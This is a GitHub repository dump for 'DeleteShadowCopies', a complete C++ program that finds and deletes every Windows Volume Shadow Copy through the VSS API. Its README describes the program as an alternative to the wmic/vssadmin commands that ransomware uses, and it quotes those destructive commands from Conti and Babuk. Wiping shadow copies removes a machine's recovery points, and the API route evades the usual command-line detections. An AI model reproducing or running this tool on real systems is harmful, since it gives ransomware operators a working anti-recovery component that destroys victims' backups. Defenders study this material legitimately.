├── DeleteShadowCopies
├── DeleteShadowCopies.vcxproj.user
├── DeleteShadowCopies.vcxproj.filters
├── DeleteShadowCopies.sln
├── DeleteShadowCopies.cpp
└── DeleteShadowCopies.vcxproj
├── README.md
└── LICENSE
/DeleteShadowCopies/DeleteShadowCopies.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ### DeleteShadowCopies: Deleting Shadow Copies In Pure C++
2 |
3 |
4 |
5 | ### After Looking at some of the leaked ransomware code, i noticed that (at least for the samples i've seen), that the ransomware is using wmic or vssadmin via command line to delete shadow copies, so out of curiosity i had to look for something else, and thus this repo (so im not helping ransomware authers) ...
6 |
7 |
8 |
9 | ```
10 | Example:
11 | - conti: wmic shadowcopy where "ID='{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}'" delete
12 | - babuk: vssadmin delete shadows /all /quiet
13 |
14 | ```
15 |
16 | ## Demo (Creating):
17 | 
18 |
19 |
20 |
21 | ## Demo (Deleting):
22 | 
23 |
24 |
25 |
26 | ### Based On [vshadow](https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/winbase/vss/vshadow/shadow.cpp)
27 |
--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 ORCA
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.1.32421.90
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DeleteShadowCopies", "DeleteShadowCopies.vcxproj", "{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x64.ActiveCfg = Debug|x64
17 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x64.Build.0 = Debug|x64
18 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x86.Build.0 = Debug|Win32
20 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x64.ActiveCfg = Release|x64
21 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x64.Build.0 = Release|x64
22 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x86.ActiveCfg = Release|Win32
23 | {9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {F2464EE4-559B-46D5-887D-1787EC5B9D4A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | ORCA:@ORCx41 10/31/2022
3 |
4 | - Program that delete shadow copies without the need of using wmic / vssadmin
5 | - Tested on w10 v 10.0.19044 x64 machine
6 |
7 | */
8 |
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 | #pragma comment (lib, "VssApi.lib")
19 | #pragma comment (lib, "ResUtils.lib")
20 |
21 |
22 |
23 |
24 |
25 | #define WSTR_GUID_FMT L"{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}"
26 |
27 | #define GUID_PRINTF_ARG( X ) \
28 | (X).Data1, \
29 | (X).Data2, \
30 | (X).Data3, \
31 | (X).Data4[0], (X).Data4[1], (X).Data4[2], (X).Data4[3], \
32 | (X).Data4[4], (X).Data4[5], (X).Data4[6], (X).Data4[7]
33 |
34 |
35 |
36 |
37 | int main() {
38 |
39 | CComPtr m_pVssObject;
40 | CComPtr pIEnumSnapshots;
41 | VSS_OBJECT_PROP Prop;
42 |
43 |
44 | VSS_SNAPSHOT_PROP& Snap = Prop.Obj.Snap;
45 | HRESULT hr = S_OK;
46 |
47 |
48 |
49 | hr = CoInitialize(NULL);
50 | if (hr != S_OK) {
51 | printf("[!] CoInitialize Failed : 0x%0.8X \n", hr);
52 | return -1;
53 | }
54 |
55 | hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_DYNAMIC_CLOAKING, NULL );
56 | if (hr != S_OK) {
57 | printf("[!] CoInitializeSecurity Failed : 0x%0.8X \n", hr);
58 | return -1;
59 | }
60 |
61 |
62 | hr = CreateVssBackupComponents(&m_pVssObject);
63 | if (hr == E_ACCESSDENIED){
64 | printf("[!] Please Run As Admin To Delete Shadow Copies \n");
65 | return -1;
66 | }
67 | if (hr != S_OK) {
68 | printf("[!] CreateVssBackupComponents Failed : 0x%0.8X \n", hr);
69 | return -1;
70 | }
71 |
72 |
73 | hr = m_pVssObject->InitializeForBackup();
74 | if (hr != S_OK) {
75 | printf("[!] InitializeForBackup Failed : 0x%0.8X \n", hr);
76 | return -1;
77 | }
78 |
79 | hr = m_pVssObject->SetContext(VSS_CTX_ALL);
80 | if (hr != S_OK){
81 | printf("[!] SetContext Failed : 0x%0.8X \n", hr);
82 | return -1;
83 | }
84 |
85 |
86 | hr = m_pVssObject->SetBackupState(true, true, VSS_BT_FULL, false);
87 | if (hr != S_OK) {
88 | printf("[!] SetBackupState Failed : 0x%0.8X \n", hr);
89 | return -1;
90 | }
91 |
92 | hr = m_pVssObject->Query(GUID_NULL, VSS_OBJECT_NONE, VSS_OBJECT_SNAPSHOT, &pIEnumSnapshots);
93 | if (hr == VSS_E_OBJECT_NOT_FOUND) {
94 | printf("[i] There Is No Shadow Copies On This Machine \n");
95 | return -1;
96 | }
97 |
98 |
99 |
100 | while (TRUE){
101 |
102 | ULONG ulFetched;
103 | hr = pIEnumSnapshots->Next(1, &Prop, &ulFetched);
104 | if (ulFetched == 0) {
105 | printf("[+] No More Shadow Copies Were Detected \n");
106 | break;
107 | }
108 | VssFreeSnapshotPropertiesInternal(&Snap);
109 |
110 | LONG lSnapshots = 0;
111 | VSS_ID idNonDeletedSnapshotID = GUID_NULL;
112 |
113 | wprintf(L"[i] Deleting shadow copy: " WSTR_GUID_FMT L" on %s from the provider: " WSTR_GUID_FMT L"\n",
114 | GUID_PRINTF_ARG(Snap.m_SnapshotId),
115 | Snap.m_pwszOriginalVolumeName,
116 | GUID_PRINTF_ARG(Snap.m_ProviderId));
117 |
118 | hr = m_pVssObject->DeleteSnapshots(Snap.m_SnapshotId, VSS_OBJECT_SNAPSHOT, FALSE, &lSnapshots, &idNonDeletedSnapshotID);
119 | if (hr != S_OK) {
120 | printf("[!] DeleteSnapshots Failed: 0x%0.8X \n", hr);
121 | }
122 | }
123 |
124 |
125 | return 0;
126 | }
127 |
--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9012cb77-37df-4cf1-a905-1b5b1028e1e9}
25 | DeleteShadowCopies
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 | false
87 |
88 |
89 |
90 | Level3
91 | true
92 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
93 | true
94 | stdcpp20
95 | MultiThreaded
96 |
97 |
98 | Console
99 | true
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
109 | true
110 | stdcpp20
111 | MultiThreaded
112 |
113 |
114 | Console
115 | true
116 | true
117 | true
118 |
119 |
120 |
121 |
122 | Level3
123 | true
124 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
125 | true
126 | MultiThreaded
127 |
128 |
129 | Console
130 | true
131 |
132 |
133 |
134 |
135 | Level3
136 | true
137 | true
138 | true
139 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
140 | true
141 | MultiThreaded
142 |
143 |
144 | Console
145 | true
146 | true
147 | true
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------